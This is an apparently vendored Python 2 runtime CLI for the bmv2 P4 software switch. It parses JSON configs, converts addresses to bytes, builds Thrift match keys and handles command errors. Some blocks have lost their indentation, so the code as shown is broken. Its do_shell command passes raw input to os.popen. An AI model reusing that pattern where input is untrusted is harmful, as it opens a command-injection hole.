] | null | null | null | networking_p4/agent/agent_drivers/bmv2/adaptor/bmv2/runtime_api.py | osinstom/networking-dppx | 3b82025090b6b2bf1e9faa58492d13ed1da6c34f | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Antonin Bas (antonin@barefootnetworks.com)
#
#
import argparse
from collections import Counter
import os
import sys
import struct
import json
from functools import wraps
from networking_p4.agent.agent_drivers.bmv2.adaptor.bmv2 import bmpy_utils as utils
from bm_runtime.standard import Standard
from bm_runtime.standard.ttypes import *
try:
from bm_runtime.simple_pre import SimplePre
except:
pass
try:
from bm_runtime.simple_pre_lag import SimplePreLAG
except:
pass
def enum(type_name, *sequential, **named):
    """Build a simple enum-like class.

    Positional names get consecutive values starting at 0; keyword
    arguments supply explicit values.  The returned class also exposes
    static to_str(value) -> name and from_str(name) -> value helpers.
    """
    enums = dict(zip(sequential, range(len(sequential))), **named)
    # FIX: use items() instead of the Python-2-only iteritems() so the
    # helper works on both Python 2 and Python 3 (identical behavior).
    reverse = dict((value, key) for key, value in enums.items())
    @staticmethod
    def to_str(x):
        return reverse[x]
    enums['to_str'] = to_str
    @staticmethod
    def from_str(x):
        return enums[x]
    enums['from_str'] = from_str
    return type(type_name, (), enums)
## Packet Replication Engine flavours supported by the target.
PreType = enum('PreType', 'None', 'SimplePre', 'SimplePreLAG')
## Whether a meter array is configured in packets or in bytes.
MeterType = enum('MeterType', 'packets', 'bytes')
## Table kinds: direct actions, indirect (action profile), indirect with selector.
TableType = enum('TableType', 'simple', 'indirect', 'indirect_ws')
## Runtime resource categories; used as the first element of SUFFIX_LOOKUP_MAP keys.
ResType = enum('ResType', 'table', 'action_prof', 'action', 'meter_array',
               'counter_array', 'register_array')
def bytes_to_string(byte_array):
    """Pack a list of integer byte values (0-255) into a raw byte string."""
    return struct.pack("%dB" % len(byte_array), *byte_array)
def table_error_name(x):
    """Map a Thrift TableOperationErrorCode value to its symbolic name."""
    return TableOperationErrorCode._VALUES_TO_NAMES[x]
def get_parser():
    """Build the command-line argument parser for the runtime CLI."""

    class ActionToPreType(argparse.Action):
        # argparse action that converts the --pre string (e.g. "SimplePre")
        # into the corresponding PreType value at parse time.
        def __init__(self, option_strings, dest, nargs=None, **kwargs):
            if nargs is not None:
                raise ValueError("nargs not allowed")
            super(ActionToPreType, self).__init__(option_strings, dest, **kwargs)

        def __call__(self, parser, namespace, values, option_string=None):
            assert(type(values) is str)
            setattr(namespace, self.dest, PreType.from_str(values))

    parser = argparse.ArgumentParser(description='BM runtime CLI')
    # One port == one device !!!! This is not a multidevice CLI
    parser.add_argument('--thrift-port', help='Thrift server port for table updates',
                        type=int, action="store", default=9090)
    parser.add_argument('--thrift-ip', help='Thrift IP address for table updates',
                        type=str, action="store", default='localhost')
    parser.add_argument('--json', help='JSON description of P4 program',
                        type=str, action="store", required=False)
    parser.add_argument('--pre', help='Packet Replication Engine used by target',
                        type=str, choices=['None', 'SimplePre', 'SimplePreLAG'],
                        default=PreType.SimplePre, action=ActionToPreType)
    return parser
# Global resource maps, populated by load_json_str() from the P4 JSON config.
TABLES = {}           # table name -> Table
ACTION_PROFS = {}     # action profile name -> ActionProf
ACTIONS = {}          # action name -> Action
METER_ARRAYS = {}     # meter array name -> MeterArray
COUNTER_ARRAYS = {}   # counter array name -> CounterArray
REGISTER_ARRAYS = {}  # register array name -> RegisterArray
CUSTOM_CRC_CALCS = {} # calculation name -> CRC output width in bits (16 or 32)

# maps (object type, unique suffix) to object
SUFFIX_LOOKUP_MAP = {}
class MatchType:
    """Integer constants for bmv2 match kinds, plus string conversions."""
    EXACT = 0
    LPM = 1
    TERNARY = 2
    VALID = 3
    RANGE = 4

    @staticmethod
    def to_str(x):
        """Return the lower-case name for a match-type value."""
        value_to_name = {0: "exact", 1: "lpm", 2: "ternary",
                         3: "valid", 4: "range"}
        return value_to_name[x]

    @staticmethod
    def from_str(x):
        """Return the match-type value for a lower-case name."""
        name_to_value = {"exact": 0, "lpm": 1, "ternary": 2,
                         "valid": 3, "range": 4}
        return name_to_value[x]
class Table:
    """In-memory description of a P4 table parsed from the JSON config."""

    def __init__(self, name, id_):
        self.name = name
        self.id_ = id_
        self.match_type_ = None
        self.actions = {}
        self.key = []  # list of (field name, match type, bit width) triples
        self.default_action = None
        self.type_ = None
        self.support_timeout = False
        self.action_prof = None  # set when the table is indirect
        TABLES[name] = self  # register in the global table map

    def num_key_fields(self):
        """Number of fields in the table's match key."""
        return len(self.key)

    def key_str(self):
        """Human-readable 'field(match_type, bitwidth)' list for the key."""
        parts = ["%s(%s, %s)" % (fname, MatchType.to_str(mtype), bw)
                 for fname, mtype, bw in self.key]
        return ",\t".join(parts)

    def table_str(self):
        """One-line summary: name, action-profile binding and match key."""
        if not self.action_prof:
            impl = "None"
        else:
            impl = self.action_prof.name
        ap_str = "implementation={}".format(impl)
        return "{0:30} [{1}, mk={2}]".format(self.name, ap_str, self.key_str())

    def get_action(self, action_name):
        """Return the Action if action_name resolves (possibly via a unique
        suffix) to an action of this table, otherwise None."""
        action = SUFFIX_LOOKUP_MAP.get((ResType.action, action_name))
        if action is not None and action.name in self.actions:
            return action
        return None
class ActionProf:
    """In-memory description of an action profile from the JSON config."""

    def __init__(self, name, id_):
        self.name = name
        self.id_ = id_
        self.with_selection = False  # True when the profile has a selector
        self.actions = {}
        self.ref_cnt = 0  # number of tables bound to this profile
        ACTION_PROFS[name] = self  # register in the global profile map

    def action_prof_str(self):
        """One-line summary: profile name and whether it uses a selector."""
        return "%-30s [%s]" % (self.name, self.with_selection)

    def get_action(self, action_name):
        """Return the Action if action_name resolves (possibly via a unique
        suffix) to an action of this profile, otherwise None."""
        action = SUFFIX_LOOKUP_MAP.get((ResType.action, action_name))
        if action is not None and action.name in self.actions:
            return action
        return None
class Action:
    """In-memory description of a P4 action from the JSON config."""

    def __init__(self, name, id_):
        self.name = name
        self.id_ = id_
        self.runtime_data = []  # list of (param name, bit width) pairs
        ACTIONS[name] = self  # register in the global action map

    def num_params(self):
        """Number of runtime parameters the action takes."""
        return len(self.runtime_data)

    def runtime_data_str(self):
        """Comma-separated 'name(bitwidth)' list of the action parameters."""
        return ",\t".join("%s(%s)" % (pname, bw)
                          for pname, bw in self.runtime_data)

    def action_str(self):
        """One-line summary: action name and its parameter list."""
        return "%-30s [%s]" % (self.name, self.runtime_data_str())
class MeterArray:
    """In-memory description of a meter array from the JSON config."""

    def __init__(self, name, id_):
        self.name = name
        self.id_ = id_
        self.type_ = None       # MeterType value (packets or bytes)
        self.is_direct = None   # True when bound directly to a table
        self.size = None
        self.binding = None
        self.rate_count = None
        METER_ARRAYS[name] = self  # register in the global meter map

    def meter_str(self):
        """One-line summary: name, size and packets/bytes type."""
        type_name = MeterType.to_str(self.type_)
        return "%-30s [%s, %s]" % (self.name, self.size, type_name)
class CounterArray:
    """In-memory description of a counter array from the JSON config."""

    def __init__(self, name, id_):
        self.name = name
        self.id_ = id_
        self.is_direct = None  # True when bound directly to a table
        self.size = None
        self.binding = None
        COUNTER_ARRAYS[name] = self  # register in the global counter map

    def counter_str(self):
        """One-line summary: name and size."""
        return "%-30s [%s]" % (self.name, self.size)
class RegisterArray:
    """In-memory description of a register array from the JSON config."""

    def __init__(self, name, id_):
        self.name = name
        self.id_ = id_
        self.width = None  # element width in bits
        self.size = None
        REGISTER_ARRAYS[name] = self  # register in the global register map

    def register_str(self):
        """One-line summary: name and size."""
        return "%-30s [%s]" % (self.name, self.size)
def reset_config():
    """Drop every resource parsed from a previously-loaded JSON config."""
    for resource_map in (TABLES, ACTION_PROFS, ACTIONS, METER_ARRAYS,
                         COUNTER_ARRAYS, REGISTER_ARRAYS,
                         CUSTOM_CRC_CALCS, SUFFIX_LOOKUP_MAP):
        resource_map.clear()
def load_json_str(json_str):
    """Populate the global resource maps (TABLES, ACTIONS, ...) from a
    bmv2 JSON configuration string, replacing any previous config."""

    def get_header_type(header_name, j_headers):
        # Resolve a header instance name to its header type name.
        for h in j_headers:
            if h["name"] == header_name:
                return h["header_type"]
        assert(0)

    def get_field_bitwidth(header_type, field_name, j_header_types):
        # Look up the bit width of field_name within the given header type.
        for h in j_header_types:
            if h["name"] != header_type: continue
            for t in h["fields"]:
                # t can have a third element (field signedness)
                f, bw = t[0], t[1]
                if f == field_name:
                    return bw
        assert(0)

    reset_config()
    json_ = json.loads(json_str)

    def get_json_key(key):
        # Missing sections (e.g. a program with no meters) act as empty lists.
        return json_.get(key, [])

    for j_action in get_json_key("actions"):
        action = Action(j_action["name"], j_action["id"])
        for j_param in j_action["runtime_data"]:
            action.runtime_data += [(j_param["name"], j_param["bitwidth"])]

    for j_pipeline in get_json_key("pipelines"):
        if "action_profiles" in j_pipeline:  # new JSON format
            for j_aprof in j_pipeline["action_profiles"]:
                action_prof = ActionProf(j_aprof["name"], j_aprof["id"])
                action_prof.with_selection = "selector" in j_aprof
        for j_table in j_pipeline["tables"]:
            table = Table(j_table["name"], j_table["id"])
            # NOTE(review): Table.__init__ defines match_type_ (trailing
            # underscore) but this sets match_type — the two never meet;
            # presumably legacy, confirm which one readers should use.
            table.match_type = MatchType.from_str(j_table["match_type"])
            table.type_ = TableType.from_str(j_table["type"])
            table.support_timeout = j_table["support_timeout"]
            for action in j_table["actions"]:
                table.actions[action] = ACTIONS[action]
            if table.type_ in {TableType.indirect, TableType.indirect_ws}:
                if "action_profile" in j_table:
                    action_prof = ACTION_PROFS[j_table["action_profile"]]
                else:  # for backward compatibility
                    assert("act_prof_name" in j_table)
                    action_prof = ActionProf(j_table["act_prof_name"],
                                             table.id_)
                    action_prof.with_selection = "selector" in j_table
                action_prof.actions.update(table.actions)
                action_prof.ref_cnt += 1
                table.action_prof = action_prof
            for j_key in j_table["key"]:
                target = j_key["target"]
                match_type = MatchType.from_str(j_key["match_type"])
                # Validity matches are exposed as a synthetic 1-bit
                # "<header>_valid" field; everything else resolves the real
                # field's bit width from the header type definitions.
                if match_type == MatchType.VALID:
                    field_name = target + "_valid"
                    bitwidth = 1
                elif target[1] == "$valid$":
                    field_name = target[0] + "_valid"
                    bitwidth = 1
                else:
                    field_name = ".".join(target)
                    header_type = get_header_type(target[0],
                                                  json_["headers"])
                    bitwidth = get_field_bitwidth(header_type, target[1],
                                                  json_["header_types"])
                table.key += [(field_name, match_type, bitwidth)]

    for j_meter in get_json_key("meter_arrays"):
        meter_array = MeterArray(j_meter["name"], j_meter["id"])
        if "is_direct" in j_meter and j_meter["is_direct"]:
            meter_array.is_direct = True
            meter_array.binding = j_meter["binding"]
        else:
            meter_array.is_direct = False
            meter_array.size = j_meter["size"]
        meter_array.type_ = MeterType.from_str(j_meter["type"])
        meter_array.rate_count = j_meter["rate_count"]

    for j_counter in get_json_key("counter_arrays"):
        counter_array = CounterArray(j_counter["name"], j_counter["id"])
        counter_array.is_direct = j_counter["is_direct"]
        if counter_array.is_direct:
            counter_array.binding = j_counter["binding"]
        else:
            counter_array.size = j_counter["size"]

    for j_register in get_json_key("register_arrays"):
        register_array = RegisterArray(j_register["name"], j_register["id"])
        register_array.size = j_register["size"]
        register_array.width = j_register["bitwidth"]

    for j_calc in get_json_key("calculations"):
        calc_name = j_calc["name"]
        if j_calc["algo"] == "crc16_custom":
            CUSTOM_CRC_CALCS[calc_name] = 16
        elif j_calc["algo"] == "crc32_custom":
            CUSTOM_CRC_CALCS[calc_name] = 32

    # Builds a dictionary mapping (object type, unique suffix) to the object
    # (Table, Action, etc...). In P4_16 the object name is the fully-qualified
    # name, which can be quite long, which is why we accept unique suffixes as
    # valid identifiers.
    # Auto-complete does not support suffixes, only the fully-qualified names,
    # but that can be changed in the future if needed.
    suffix_count = Counter()
    for res_type, res_dict in [
            (ResType.table, TABLES), (ResType.action_prof, ACTION_PROFS),
            (ResType.action, ACTIONS), (ResType.meter_array, METER_ARRAYS),
            (ResType.counter_array, COUNTER_ARRAYS),
            (ResType.register_array, REGISTER_ARRAYS)]:
        for name, res in res_dict.items():
            suffix = None
            # Register every progressively-longer dotted suffix of the name.
            for s in reversed(name.split('.')):
                suffix = s if suffix is None else s + '.' + suffix
                key = (res_type, suffix)
                SUFFIX_LOOKUP_MAP[key] = res
                suffix_count[key] += 1
    # A suffix shared by several objects is ambiguous: drop it.
    for key, c in suffix_count.items():
        if c > 1:
            del SUFFIX_LOOKUP_MAP[key]
class UIn_Error(Exception):
    """Base class for all user-input errors raised by the CLI."""

    def __str__(self):
        return self.info

    def __init__(self, info=""):
        self.info = info
class UIn_ResourceError(UIn_Error):
    """Raised when a resource (table, action profile, ...) name is unknown."""

    def __str__(self):
        return "Invalid {} name ({})".format(self.res_type, self.name)

    def __init__(self, res_type, name):
        self.res_type = res_type
        self.name = name
class UIn_MatchKeyError(UIn_Error):
    """Raised when a match-key field cannot be parsed."""

    def __str__(self):
        return self.info

    def __init__(self, info=""):
        self.info = info
class UIn_RuntimeDataError(UIn_Error):
    """Raised when an action's runtime data cannot be parsed."""

    def __str__(self):
        return self.info

    def __init__(self, info=""):
        self.info = info
class CLI_FormatExploreError(Exception):
    # internal control-flow exception: raised by the *Addr_to_bytes helpers
    # when the input does not even look like that address format, so the
    # caller can fall back to another parser (e.g. plain integer)
    def __init__(self):
        pass
class UIn_BadParamError(UIn_Error):
    """Raised when a single action/key parameter is malformed."""

    def __str__(self):
        return self.info

    def __init__(self, info=""):
        self.info = info
class UIn_BadIPv4Error(UIn_Error):
    # malformed IPv4 address (looked like one, but failed to parse)
    def __init__(self):
        pass
class UIn_BadIPv6Error(UIn_Error):
    # malformed IPv6 address (looked like one, but failed to parse)
    def __init__(self):
        pass
class UIn_BadMacError(UIn_Error):
    # malformed MAC address (looked like one, but failed to parse)
    def __init__(self):
        pass
def ipv4Addr_to_bytes(addr):
    """Convert a dotted-decimal IPv4 string to a list of 4 byte values.

    Raises CLI_FormatExploreError when the string does not look like an
    IPv4 address at all (no '.'), so the caller can try other formats.
    Raises UIn_BadIPv4Error when it looks like one but is malformed.
    """
    if '.' not in addr:
        raise CLI_FormatExploreError()
    octets = addr.split('.')
    if len(octets) != 4:
        raise UIn_BadIPv4Error()
    try:
        values = [int(b) for b in octets]
    except ValueError:
        # narrow except: the original bare except also swallowed e.g.
        # KeyboardInterrupt
        raise UIn_BadIPv4Error()
    # BUG FIX: reject out-of-range octets such as "300.1.2.3" or "-1.0.0.0",
    # which the original silently accepted
    if not all(0 <= v <= 255 for v in values):
        raise UIn_BadIPv4Error()
    return values
def macAddr_to_bytes(addr):
    """Convert a colon-separated MAC string to a list of 6 byte values.

    Raises CLI_FormatExploreError when the string does not look like a MAC
    address at all (no ':'); UIn_BadMacError when it is malformed.
    """
    if ':' not in addr:
        raise CLI_FormatExploreError()
    groups = addr.split(':')
    if len(groups) != 6:
        raise UIn_BadMacError()
    try:
        values = [int(b, 16) for b in groups]
    except ValueError:
        # narrow except instead of the original bare except
        raise UIn_BadMacError()
    # BUG FIX: reject groups outside a single byte, e.g. "1ff:...", which
    # the original silently accepted
    if not all(0 <= v <= 255 for v in values):
        raise UIn_BadMacError()
    return values
def ipv6Addr_to_bytes(addr):
    """Convert an IPv6 address string to a list of 16 byte values.

    Raises CLI_FormatExploreError when the string does not look like an
    IPv6 address at all (no ':'); UIn_BadIPv6Error when it is malformed.
    """
    # local import: 'ipaddr' is an optional third-party dependency, only
    # needed when 128-bit fields are actually used
    from ipaddr import IPv6Address
    if ':' not in addr:
        raise CLI_FormatExploreError()
    try:
        ip = IPv6Address(addr)
    except ValueError:
        # narrow except: ipaddr raises ValueError on malformed addresses;
        # the original bare except also swallowed unrelated errors
        raise UIn_BadIPv6Error()
    try:
        return [ord(b) for b in ip.packed]
    except (TypeError, ValueError):
        raise UIn_BadIPv6Error()
def int_to_bytes(i, num):
    """Encode non-negative integer `i` big-endian into exactly `num` bytes.

    Returns a list of int byte values, zero-padded on the left.
    Raises UIn_BadParamError when `i` does not fit in `num` bytes.
    """
    byte_array = []
    while i > 0:
        byte_array.append(i % 256)
        # BUG FIX: use floor division; plain '/' is true division under
        # Python 3 and would loop on floats ('//' is identical in Python 2)
        i //= 256
        num -= 1
    if num < 0:
        raise UIn_BadParamError("Parameter is too large")
    # left-pad with zero bytes up to the requested width
    while num > 0:
        byte_array.append(0)
        num -= 1
    byte_array.reverse()
    return byte_array
def parse_param(input_str, bitwidth):
    """Parse one textual parameter into a big-endian list of byte values.

    Width-specific formats are tried first: IPv4 for 32-bit, MAC for
    48-bit, IPv6 for 128-bit. If the string does not look like that
    format, falls back to integer parsing (decimal or 0x/0o/0b prefixed).
    Raises UIn_BadParamError on malformed input.
    """
    if bitwidth == 32:
        try:
            return ipv4Addr_to_bytes(input_str)
        except CLI_FormatExploreError:
            # not dotted notation: fall through to integer parsing
            pass
        except UIn_BadIPv4Error:
            raise UIn_BadParamError("Invalid IPv4 address")
    elif bitwidth == 48:
        try:
            return macAddr_to_bytes(input_str)
        except CLI_FormatExploreError:
            pass
        except UIn_BadMacError:
            raise UIn_BadParamError("Invalid MAC address")
    elif bitwidth == 128:
        try:
            return ipv6Addr_to_bytes(input_str)
        except CLI_FormatExploreError:
            pass
        except UIn_BadIPv6Error:
            raise UIn_BadParamError("Invalid IPv6 address")
    try:
        input_ = int(input_str, 0)
    except (ValueError, TypeError):
        # narrow except instead of the original bare except
        raise UIn_BadParamError(
            "Invalid input, could not cast to integer, try in hex with 0x prefix"
        )
    # (bitwidth + 7) // 8 bytes are needed; floor division keeps this an
    # int under Python 3 as well.  The original wrapped this call in a
    # try/except that only re-raised the same exception, dropped here.
    return int_to_bytes(input_, (bitwidth + 7) // 8)
def parse_runtime_data(action, params):
    """Parse textual action parameters into packed byte strings.

    Widths are taken from action.runtime_data; raises UIn_RuntimeDataError
    on any field that fails to parse.
    """
    def parse_param_(field, bw):
        try:
            return parse_param(field, bw)
        except UIn_BadParamError as e:
            raise UIn_RuntimeDataError(
                "Error while parsing %s - %s" % (field, e)
            )
    widths = [bw for (_, bw) in action.runtime_data]
    return [bytes_to_string(parse_param_(value, bw))
            for value, bw in zip(params, widths)]
# maps this module's MatchType enum values to the Thrift-generated
# BmMatchParamType values used on the wire
_match_types_mapping = {
    MatchType.EXACT : BmMatchParamType.EXACT,
    MatchType.LPM : BmMatchParamType.LPM,
    MatchType.TERNARY : BmMatchParamType.TERNARY,
    MatchType.VALID : BmMatchParamType.VALID,
    MatchType.RANGE : BmMatchParamType.RANGE,
}
def parse_match_key(table, key_fields):
    """Parse textual match-key fields into a list of BmMatchParam objects.

    Each field is parsed according to the corresponding key field's match
    type (exact / lpm / ternary / valid / range) and bitwidth, taken in
    order from table.key.  Raises UIn_MatchKeyError on malformed input.
    """
    def parse_param_(field, bw):
        try:
            return parse_param(field, bw)
        except UIn_BadParamError as e:
            raise UIn_MatchKeyError(
                "Error while parsing %s - %s" % (field, e)
            )
    params = []
    match_types = [t for (_, t, _) in table.key]
    bitwidths = [bw for (_, _, bw) in table.key]
    for idx, field in enumerate(key_fields):
        param_type = _match_types_mapping[match_types[idx]]
        bw = bitwidths[idx]
        if param_type == BmMatchParamType.EXACT:
            key = bytes_to_string(parse_param_(field, bw))
            param = BmMatchParam(type = param_type,
                                 exact = BmMatchParamExact(key))
        elif param_type == BmMatchParamType.LPM:
            try:
                prefix, length = field.split("/")
            except ValueError:
                raise UIn_MatchKeyError(
                    "Invalid LPM value {}, use '/' to separate prefix "
                    "and length".format(field))
            key = bytes_to_string(parse_param_(prefix, bw))
            param = BmMatchParam(type = param_type,
                                 lpm = BmMatchParamLPM(key, int(length)))
        elif param_type == BmMatchParamType.TERNARY:
            try:
                key, mask = field.split("&&&")
            except ValueError:
                raise UIn_MatchKeyError(
                    "Invalid ternary value {}, use '&&&' to separate key and "
                    "mask".format(field))
            key = bytes_to_string(parse_param_(key, bw))
            mask = bytes_to_string(parse_param_(mask, bw))
            if len(mask) != len(key):
                raise UIn_MatchKeyError(
                    "Key and mask have different lengths in expression %s" % field
                )
            param = BmMatchParam(type = param_type,
                                 ternary = BmMatchParamTernary(key, mask))
        elif param_type == BmMatchParamType.VALID:
            key = bool(int(field))
            param = BmMatchParam(type = param_type,
                                 valid = BmMatchParamValid(key))
        elif param_type == BmMatchParamType.RANGE:
            try:
                start, end = field.split("->")
            except ValueError:
                raise UIn_MatchKeyError(
                    "Invalid range value {}, use '->' to separate range start "
                    "and range end".format(field))
            start = bytes_to_string(parse_param_(start, bw))
            end = bytes_to_string(parse_param_(end, bw))
            if len(start) != len(end):
                raise UIn_MatchKeyError(
                    "start and end have different lengths in expression %s" % field
                )
            # byte strings of equal length compare lexicographically, which
            # matches big-endian numeric order
            if start > end:
                # BUG FIX: the message used to say "start is less than end",
                # the opposite of the condition being reported
                raise UIn_MatchKeyError(
                    "start is greater than end in expression %s" % field
                )
            param = BmMatchParam(type = param_type,
                                 range = BmMatchParamRange(start, end))
        else:
            assert(0)
        params.append(param)
    return params
def printable_byte_str(s):
    """Render a raw byte string as colon-separated lowercase hex pairs."""
    hex_pairs = ["{:02x}".format(ord(c)) for c in s]
    return ":".join(hex_pairs)
def BmMatchParam_to_str(self):
    """Readable rendering of a BmMatchParam (monkey-patched in as to_str).

    Only one of the per-type sub-fields is ever set; the others contribute
    an empty string.
    """
    sub_params = (self.exact, self.lpm, self.ternary, self.valid, self.range)
    rendered = "".join(p.to_str() if p else "" for p in sub_params)
    return BmMatchParamType._VALUES_TO_NAMES[self.type] + "-" + rendered
def BmMatchParamExact_to_str(self):
    # exact match: just the key as hex
    return printable_byte_str(self.key)
def BmMatchParamLPM_to_str(self):
    # LPM match: key as hex plus "/<prefix length>"
    return printable_byte_str(self.key) + "/" + str(self.prefix_length)
def BmMatchParamTernary_to_str(self):
    # ternary match: "<key> &&& <mask>", both as hex
    return printable_byte_str(self.key) + " &&& " + printable_byte_str(self.mask)
def BmMatchParamValid_to_str(self):
    # valid match carries no printable payload
    return ""
def BmMatchParamRange_to_str(self):
    # range match: "<start> -> <end>", both as hex
    return printable_byte_str(self.start) + " -> " + printable_byte_str(self.end_)
# monkey-patch the Thrift-generated match-param classes with the to_str
# helpers defined above, so match keys can be pretty-printed by the CLI
BmMatchParam.to_str = BmMatchParam_to_str
BmMatchParamExact.to_str = BmMatchParamExact_to_str
BmMatchParamLPM.to_str = BmMatchParamLPM_to_str
BmMatchParamTernary.to_str = BmMatchParamTernary_to_str
BmMatchParamValid.to_str = BmMatchParamValid_to_str
BmMatchParamRange.to_str = BmMatchParamRange_to_str
# services is [(service_name, client_class), ...]
def thrift_connect(thrift_ip, thrift_port, services):
    # thin wrapper so importers of this module need not depend on utils
    return utils.thrift_connect(thrift_ip, thrift_port, services)
def handle_bad_input(f):
    """Decorator for do_* commands: turn expected errors into messages.

    Catches the CLI's own user-input errors and the Thrift-generated
    Invalid*Operation exceptions, printing a short diagnostic instead of
    letting a traceback kill the interactive session.  Any other exception
    still propagates.
    """
    @wraps(f)
    def handle(*args, **kwargs):
        try:
            return f(*args, **kwargs)
        except UIn_MatchKeyError as e:
            print "Invalid match key:", e
        except UIn_RuntimeDataError as e:
            print "Invalid runtime data:", e
        except UIn_Error as e:
            print "Error:", e
        except InvalidTableOperation as e:
            # the Thrift exceptions carry a numeric code; map it back to the
            # symbolic name for display
            error = TableOperationErrorCode._VALUES_TO_NAMES[e.code]
            print "Invalid table operation (%s)" % error
        except InvalidCounterOperation as e:
            error = CounterOperationErrorCode._VALUES_TO_NAMES[e.code]
            print "Invalid counter operation (%s)" % error
        except InvalidMeterOperation as e:
            error = MeterOperationErrorCode._VALUES_TO_NAMES[e.code]
            print "Invalid meter operation (%s)" % error
        except InvalidRegisterOperation as e:
            error = RegisterOperationErrorCode._VALUES_TO_NAMES[e.code]
            print "Invalid register operation (%s)" % error
        except InvalidLearnOperation as e:
            error = LearnOperationErrorCode._VALUES_TO_NAMES[e.code]
            print "Invalid learn operation (%s)" % error
        except InvalidSwapOperation as e:
            error = SwapOperationErrorCode._VALUES_TO_NAMES[e.code]
            print "Invalid swap operation (%s)" % error
        except InvalidDevMgrOperation as e:
            error = DevMgrErrorCode._VALUES_TO_NAMES[e.code]
            print "Invalid device manager operation (%s)" % error
        except InvalidCrcOperation as e:
            error = CrcErrorCode._VALUES_TO_NAMES[e.code]
            print "Invalid crc operation (%s)" % error
    return handle
def handle_bad_input_mc(f):
    """Like handle_bad_input, but also catches multicast (PRE) errors.

    The exception class and error-code enum depend on which PRE
    implementation the switch was built with, so they are selected at call
    time from the command object's pre_type.
    """
    @wraps(f)
    def handle(*args, **kwargs):
        pre_type = args[0].pre_type
        # no PRE configured: only the standard error handling applies
        if pre_type == PreType.None:
            return handle_bad_input(f)(*args, **kwargs)
        EType = {
            PreType.SimplePre : SimplePre.InvalidMcOperation,
            PreType.SimplePreLAG : SimplePreLAG.InvalidMcOperation
        }[pre_type]
        Codes = {
            PreType.SimplePre : SimplePre.McOperationErrorCode,
            PreType.SimplePreLAG : SimplePreLAG.McOperationErrorCode
        }[pre_type]
        try:
            return handle_bad_input(f)(*args, **kwargs)
        except EType as e:
            error = Codes._VALUES_TO_NAMES[e.code]
            print "Invalid PRE operation (%s)" % error
    return handle
def deprecated_act_prof(substitute, with_selection=False,
                        strictly_deprecated=True):
    """Decorator factory for legacy table_indirect_* commands.

    The generated wrapper validates the table argument, rewrites it into
    the table's action profile name and forwards the whole line to the
    do_<substitute> command.  When strictly_deprecated, the wrapped
    command's help text is marked and a warning is emitted on use.
    """
    # need two levels here because our decorator takes arguments
    def deprecated_act_prof_(f):
        # not sure if this is the right place for it, if I want it to play nice
        # with @wraps
        if strictly_deprecated:
            f.__doc__ = "[DEPRECATED!] " + f.__doc__
            f.__doc__ += "\nUse '{}' instead".format(substitute)
        @wraps(f)
        def wrapper(obj, line):
            substitute_fn = getattr(obj, "do_" + substitute)
            args = line.split()
            obj.at_least_n_args(args, 1)
            table_name = args[0]
            table = obj.get_res("table", table_name, ResType.table)
            if with_selection:
                obj.check_indirect_ws(table)
            else:
                obj.check_indirect(table)
            # indirect tables always reference an action profile
            assert(table.action_prof is not None)
            assert(table.action_prof.ref_cnt > 0)
            if strictly_deprecated and table.action_prof.ref_cnt > 1:
                raise UIn_Error(
                    "Legacy command does not work with shared action profiles")
            # replace the table name with its action profile name and forward
            args[0] = table.action_prof.name
            if strictly_deprecated:
                # writing to stderr in case someone is parsing stdout
                sys.stderr.write(
                    "This is a deprecated command, use '{}' instead\n".format(
                        substitute))
            return substitute_fn(" ".join(args))
        # we add the handle_bad_input decorator "programatically"
        return handle_bad_input(wrapper)
    return deprecated_act_prof_
# thrift does not support unsigned integers
def hex_to_i16(h):
    """Parse a numeric string and reinterpret it as a signed 16-bit int."""
    value = int(h, 0)
    if value > 0xFFFF:
        raise UIn_Error("Integer cannot fit within 16 bits")
    return value - 0x10000 if value > 0x7FFF else value
def i16_to_hex(h):
    """Reinterpret a signed 16-bit int as its unsigned representation."""
    value = int(h)
    return value + 0x10000 if value & 0x8000 else value
def hex_to_i32(h):
    """Parse a numeric string and reinterpret it as a signed 32-bit int."""
    value = int(h, 0)
    if value > 0xFFFFFFFF:
        raise UIn_Error("Integer cannot fit within 32 bits")
    return value - 0x100000000 if value > 0x7FFFFFFF else value
def i32_to_hex(h):
    """Reinterpret a signed 32-bit int as its unsigned representation."""
    value = int(h)
    return value + 0x100000000 if value & 0x80000000 else value
def parse_bool(s):
    """Parse a CLI boolean: 'true'/'false' (capitalized or not) or any int.

    Integer strings (decimal or 0x/0o/0b prefixed) are truth-tested.
    Raises UIn_Error on anything else.
    """
    if s in ("true", "True"):
        return True
    if s in ("false", "False"):
        return False
    try:
        # narrow except: the original bare except also swallowed e.g.
        # KeyboardInterrupt
        return bool(int(s, 0))
    except (ValueError, TypeError):
        raise UIn_Error("Invalid bool parameter")
class RuntimeAPI():
prompt = 'RuntimeCmd: '
intro = "Control utility for runtime P4 table manipulation"
@staticmethod
def get_thrift_services(pre_type):
services = [("standard", Standard.Client)]
if pre_type == PreType.SimplePre:
services += [("simple_pre", SimplePre.Client)]
elif pre_type == PreType.SimplePreLAG:
services += [("simple_pre_lag", SimplePreLAG.Client)]
else:
services += [(None, None)]
return services
    def __init__(self, pre_type, standard_client, mc_client=None):
        # standard_client: Thrift Standard.Client used for all table /
        # counter / meter / register RPCs
        # mc_client: optional multicast (PRE) client; None when no PRE
        self.client = standard_client
        self.mc_client = mc_client
        self.pre_type = pre_type
    def do_greet(self, line):
        # trivial liveness-check command
        print "hello"
    def do_EOF(self, line):
        # returning True tells cmd.Cmd to leave the command loop (Ctrl-D)
        print
        return True
    def do_shell(self, line):
        "Run a shell command"
        # NOTE(review): passes the raw line to a shell; acceptable for an
        # interactive debug CLI, unsafe if ever fed untrusted input
        output = os.popen(line).read()
        print output
def get_res(self, type_name, name, res_type):
key = res_type, name
if key not in SUFFIX_LOOKUP_MAP:
raise UIn_ResourceError(type_name, name)
return SUFFIX_LOOKUP_MAP[key]
def at_least_n_args(self, args, n):
if len(args) < n:
raise UIn_Error("Insufficient number of args")
def exactly_n_args(self, args, n):
if len(args) != n:
raise UIn_Error(
"Wrong number of args, expected %d but got %d" % (n, len(args))
)
def _complete_res(self, array, text):
res = sorted(array.keys())
if not text:
return res
return [r for r in res if r.startswith(text)]
    @handle_bad_input
    def do_show_tables(self, line):
